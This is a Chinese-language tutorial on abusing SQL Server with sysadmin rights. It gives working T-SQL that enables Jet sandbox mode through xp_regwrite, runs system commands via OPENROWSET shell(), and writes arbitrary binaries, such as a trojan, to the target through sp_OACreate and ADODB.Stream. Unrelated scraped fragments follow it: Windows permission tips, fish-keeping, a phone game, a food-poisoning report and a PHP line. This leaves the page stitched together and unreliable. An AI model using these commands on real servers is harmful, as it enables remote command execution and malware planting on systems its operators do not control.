以下 *** 都以需要SA权限为前提。
1, 沙盒模式的变通.
原始 *** :
之一句开启沙盘模式:exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
复制代码第二句利用jet.oledb执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("CMD命令")’)
复制代码但是,当 X:\Windows\System32\ias\dnary.mdb 或 X:\Windows\System32\ias\ias.mdb 被删除时,命令就会无效了.
所以利用以下语句创建一个数据库:(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用.)
复制代码代码如下:
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate ’ADOX.Catalog’,@object OUTPUT
exec @hr = sp_OAMethod @object,’Create’,@property output,’Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml’
然后再利用jet.oledb调用SysSetup.xml执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=SysSetup.xml’,’select shell("CMD命令")’)
2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此 *** 不支持文件大于64KB)
当已经有一个程序需要放到对方计算机的时候.(例如, 放MA。)
将这个文件转成HEX代码。
如果不知道怎么把文件转成HEX代码,请使用下面的工具.
File2Hex.rar (424 Bytes)
使用 *** 很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含HEX代码的文本.
然后用以下 *** 写入到对方计算机中。
复制代码代码如下:
DECLARE @ObjectToken INT
EXEC sp_OACreate ’ADODB.Stream’, @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, ’Type’, 1
EXEC sp_OAMethod @ObjectToken, ’Open’
EXEC sp_OAMethod @ObjectToken, ’Write’, NULL, 0x123456(其中0x123456为HEX内容)
EXEC sp_OAMethod @ObjectToken, ’SaveToFile’, NULL, ’Test.exe(文件名)’, 2
EXEC sp_OAMethod @ObjectToken, ’Close’
EXEC sp_OADestroy @ObjectToken
朋友们大家了解win10如何获得访问权限呢?今日我很愿意与大伙儿共享删除文件夹提醒必须管理人员administretor管理权限解决方法,很感兴趣的能够来掌握掌握哦。 朋友们大家了解win...
接吻鱼怎么养(接吻鱼的饲养基础小知识) 接吻鱼,乳白色散发金属般光泽的侧扁卵圆形鱼体,十分活跃地在水族箱中自由穿梭,并不时用它们浅肉色的嘴巴啃食着水草、水族箱壁以及饰物上的水藻、青苔。 它们时而头...
手机侧装备抓包 第一章 若干年的地下工业链活动 1第三级,7.0-10.0分的高危缝隙,这类缝隙根本可以彻底绕过体系认证,进犯者可以拜访、读写、损坏体系中的秘要数据,而且会形成体系溃散。 Ste...
《黑客模拟器免谷歌去广告版》是一款十分好玩儿的仿真模拟饰演黑客开展主题活动的非常烧脑手机上游戏,游戏中玩家将饰演互联网黑客,和别的玩家私底下信息交流,进攻敌人的互联网,进而升級自身的手机软件武器装备,...
针对此前“广西村民哄抢海上榴莲食用后集体中毒”一事,日前,广西壮族自治区疾控中心公布调查结果称,本次案件的真凶是副溶血性弧菌。据了解,副溶血性弧菌是喜欢盐的微生物,是夏秋季沿海地区食物中毒的重要致病菌...
$_POST[$key] = daddslashes($value); 很多人会费尽心机设置一个看起来安全的暗码,但有一些隐秘或许并没有它看起来那么安全,比方下面这个:2: r...